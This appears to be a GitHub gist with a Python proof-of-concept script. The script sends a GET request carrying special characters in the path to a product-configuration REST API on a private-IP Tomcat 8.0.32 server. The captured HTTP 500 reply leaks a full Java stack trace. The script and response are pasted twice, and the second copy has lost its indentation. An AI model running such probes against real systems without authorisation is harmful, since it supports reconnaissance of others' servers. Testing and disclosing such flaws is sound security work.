HouqiyuA/gist:2073ad903f4d85284947c4674aa6e601

## gistfile1.txt
import requests
import urllib.parse

HOST = "192.168.126.129"
PORT = 8080
BASE_URL = f"http://{HOST}:{PORT}"

def test_path_injection(base_path, test_cases):
    headers = {
        "Accept": "application/json",
        "Host": "localhost:50100"
    }

    for test_name, test_value in test_cases.items():
        # Construct test path by replacing both 'aaa' segments
        test_path = base_path.replace("aaa", test_value, 2)

        print(f"\n[+] Testing {test_name}: {test_value}")
        print(f"Full path: {test_path}")

        try:
            response = requests.get(
                f"{BASE_URL}{test_path}",
                headers=headers
            )

            # Print request and response details
            print(f"\nRequest sent:")
            print(f"  Method: GET")
            print(f"  URL: {BASE_URL}{test_path}")
            print(f"  Headers: {headers}")

            print(f"\nResponse received:")
            print(f"  Status Code: {response.status_code}")
            print(f"  Headers: {response.headers}")
            print(f"  Body: {response.text}")

        except Exception as e:
            print(f"Error occurred: {str(e)}")

if __name__ == "__main__":
    original_path = "/products/aaa/configurations/aaa"

    test_cases = {
        "Special Chars": "!@#$%^&*()"
    }

    print("[*] Starting path parameter injection tests")
    print(f"Original path: {original_path}")
    print(f"Target server: {BASE_URL}")

    test_path_injection(original_path, test_cases)

    print("\n[*] Testing completed")


    '''
    Response received:
  Status Code: 500
  Headers: {'Server': 'Apache-Coyote/1.1', 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'POST, PUT, GET, OPTIONS, DELETE', 'Access-Control-Allow-Headers': 'x-requested-with', 'Access-Control-Max-Age': '3600', 'Content-Type': 'text/html;charset=utf-8', 'Content-Language': 'en', 'Content-Length': '6881', 'Date': 'Tue, 13 May 2025 08:46:10 GMT', 'Connection': 'close'}
  Body: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.32 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 500 - org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</h1><div class="line"></div><p><b>type</b> Exception report</p><p><b>message</b> <u>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</u></p><p><b>description</b> <u>The server encountered an internal error that prevented it from fulfilling this request.</u></p><p><b>exception</b></p><pre>javax.servlet.ServletException: org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
        org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:489)
        org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
        org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
        org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
        org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
        org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
        org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
        org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
</pre><p><b>root cause</b></p><pre>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
        org.javiermf.features.daos.ProductsDAO.findByName(ProductsDAO.java:41)
        org.javiermf.features.daos.ProductsDAO$$FastClassBySpringCGLIB$$94b988be.invoke(&lt;generated&gt;)
        org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
        org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.invokeJoinpoint(CglibAopProxy.java:720)
        org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157)
        org.springframework.dao.support.PersistenceExceptionTranslationInterceptor.invoke(PersistenceExceptionTranslationInterceptor.java:136)
        org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179)
        org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:655)
        org.javiermf.features.daos.ProductsDAO$$EnhancerBySpringCGLIB$$39a01f0f.findByName(&lt;generated&gt;)
        org.javiermf.features.services.ProductsService.findByName(ProductsService.java:41)
        org.javiermf.features.services.ProductsService$$FastClassBySpringCGLIB$$36810a9e.invoke(&lt;generated&gt;)
        org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
        org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:651)
        org.javiermf.features.services.ProductsService$$EnhancerBySpringCGLIB$$29ac44ef.findByName(&lt;generated&gt;)
        org.javiermf.features.services.rest.ProductsResource.getProductByName(ProductsResource.java:44)
        sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        java.lang.reflect.Method.invoke(Method.java:498)
        org.glassfish.jersey.server.model.internal.ResourceMethodInvocationHandlerFactory$1.invoke(ResourceMethodInvocationHandlerFactory.java:81)
        org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher$1.run(AbstractJavaResourceMethodDispatcher.java:144)
        org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.invoke(AbstractJavaResourceMethodDispatcher.java:161)
        org.glassfish.jersey.server.model.internal.JavaResourceMethodDispatcherProvider$TypeOutInvoker.doDispatch(JavaResourceMethodDispatcherProvider.java:205)
        org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.dispatch(AbstractJavaResourceMethodDispatcher.java:99)
        org.glassfish.jersey.server.model.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:389)
        org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:347)
        org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:102)
        org.glassfish.jersey.server.ServerRuntime$2.run(ServerRuntime.java:326)
        org.glassfish.jersey.internal.Errors$1.call(Errors.java:271)
        org.glassfish.jersey.internal.Errors$1.call(Errors.java:267)
        org.glassfish.jersey.internal.Errors.process(Errors.java:315)
        org.glassfish.jersey.internal.Errors.process(Errors.java:297)
        org.glassfish.jersey.internal.Errors.process(Errors.java:267)
        org.glassfish.jersey.process.internal.RequestScope.runInScope(RequestScope.java:317)
        org.glassfish.jersey.server.ServerRuntime.process(ServerRuntime.java:305)
        org.glassfish.jersey.server.ApplicationHandler.handle(ApplicationHandler.java:1154)
        org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:473)
        org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
        org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
        org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
        org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
        org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
        org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
        org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
        org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
</pre><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/8.0.32 logs.</u></p><hr class="line"><h3>Apache Tomcat/8.0.32</h3></body></html>
    '''
	import requests
	import urllib.parse

	HOST = "192.168.126.129"
	PORT = 8080
	BASE_URL = f"http://{HOST}:{PORT}"

	def test_path_injection(base_path, test_cases):
	headers = {
	"Accept": "application/json",
	"Host": "localhost:50100"
	}

	for test_name, test_value in test_cases.items():
	# Construct test path by replacing both 'aaa' segments
	test_path = base_path.replace("aaa", test_value, 2)

	print(f"\n[+] Testing {test_name}: {test_value}")
	print(f"Full path: {test_path}")

	try:
	response = requests.get(
	f"{BASE_URL}{test_path}",
	headers=headers
	)

	# Print request and response details
	print(f"\nRequest sent:")
	print(f" Method: GET")
	print(f" URL: {BASE_URL}{test_path}")
	print(f" Headers: {headers}")

	print(f"\nResponse received:")
	print(f" Status Code: {response.status_code}")
	print(f" Headers: {response.headers}")
	print(f" Body: {response.text}")

	except Exception as e:
	print(f"Error occurred: {str(e)}")

	if __name__ == "__main__":
	original_path = "/products/aaa/configurations/aaa"

	test_cases = {
	"Special Chars": "!@#$%^&*()"
	}

	print("[*] Starting path parameter injection tests")
	print(f"Original path: {original_path}")
	print(f"Target server: {BASE_URL}")

	test_path_injection(original_path, test_cases)

	print("\n[*] Testing completed")



	'''
	Response received:
	Status Code: 500
	Headers: {'Server': 'Apache-Coyote/1.1', 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'POST, PUT, GET, OPTIONS, DELETE', 'Access-Control-Allow-Headers': 'x-requested-with', 'Access-Control-Max-Age': '3600', 'Content-Type': 'text/html;charset=utf-8', 'Content-Language': 'en', 'Content-Length': '6881', 'Date': 'Tue, 13 May 2025 08:46:10 GMT', 'Connection': 'close'}
	Body: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.32 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 500 - org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</h1><div class="line"></div><p><b>type</b> Exception report</p><p><b>message</b> <u>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</u></p><p><b>description</b> <u>The server encountered an internal error that prevented it from fulfilling this request.</u></p><p><b>exception</b></p><pre>javax.servlet.ServletException: org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
	org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:489)
	org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
	org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
	org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
	org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
	</pre><p><b>root cause</b></p><pre>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
	org.javiermf.features.daos.ProductsDAO.findByName(ProductsDAO.java:41)
	org.javiermf.features.daos.ProductsDAO$$FastClassBySpringCGLIB$$94b988be.invoke(<generated>)
	org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
	org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.invokeJoinpoint(CglibAopProxy.java:720)
	org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157)
	org.springframework.dao.support.PersistenceExceptionTranslationInterceptor.invoke(PersistenceExceptionTranslationInterceptor.java:136)
	org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179)
	org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:655)
	org.javiermf.features.daos.ProductsDAO$$EnhancerBySpringCGLIB$$39a01f0f.findByName(<generated>)
	org.javiermf.features.services.ProductsService.findByName(ProductsService.java:41)
	org.javiermf.features.services.ProductsService$$FastClassBySpringCGLIB$$36810a9e.invoke(<generated>)
	org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
	org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:651)
	org.javiermf.features.services.ProductsService$$EnhancerBySpringCGLIB$$29ac44ef.findByName(<generated>)
	org.javiermf.features.services.rest.ProductsResource.getProductByName(ProductsResource.java:44)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.glassfish.jersey.server.model.internal.ResourceMethodInvocationHandlerFactory$1.invoke(ResourceMethodInvocationHandlerFactory.java:81)
	org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher$1.run(AbstractJavaResourceMethodDispatcher.java:144)
	org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.invoke(AbstractJavaResourceMethodDispatcher.java:161)
	org.glassfish.jersey.server.model.internal.JavaResourceMethodDispatcherProvider$TypeOutInvoker.doDispatch(JavaResourceMethodDispatcherProvider.java:205)
	org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.dispatch(AbstractJavaResourceMethodDispatcher.java:99)
	org.glassfish.jersey.server.model.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:389)
	org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:347)
	org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:102)
	org.glassfish.jersey.server.ServerRuntime$2.run(ServerRuntime.java:326)
	org.glassfish.jersey.internal.Errors$1.call(Errors.java:271)
	org.glassfish.jersey.internal.Errors$1.call(Errors.java:267)
	org.glassfish.jersey.internal.Errors.process(Errors.java:315)
	org.glassfish.jersey.internal.Errors.process(Errors.java:297)
	org.glassfish.jersey.internal.Errors.process(Errors.java:267)
	org.glassfish.jersey.process.internal.RequestScope.runInScope(RequestScope.java:317)
	org.glassfish.jersey.server.ServerRuntime.process(ServerRuntime.java:305)
	org.glassfish.jersey.server.ApplicationHandler.handle(ApplicationHandler.java:1154)
	org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:473)
	org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
	org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
	org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
	org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
	org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
	</pre><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/8.0.32 logs.</u></p><hr class="line"><h3>Apache Tomcat/8.0.32</h3></body></html>
	'''
No results found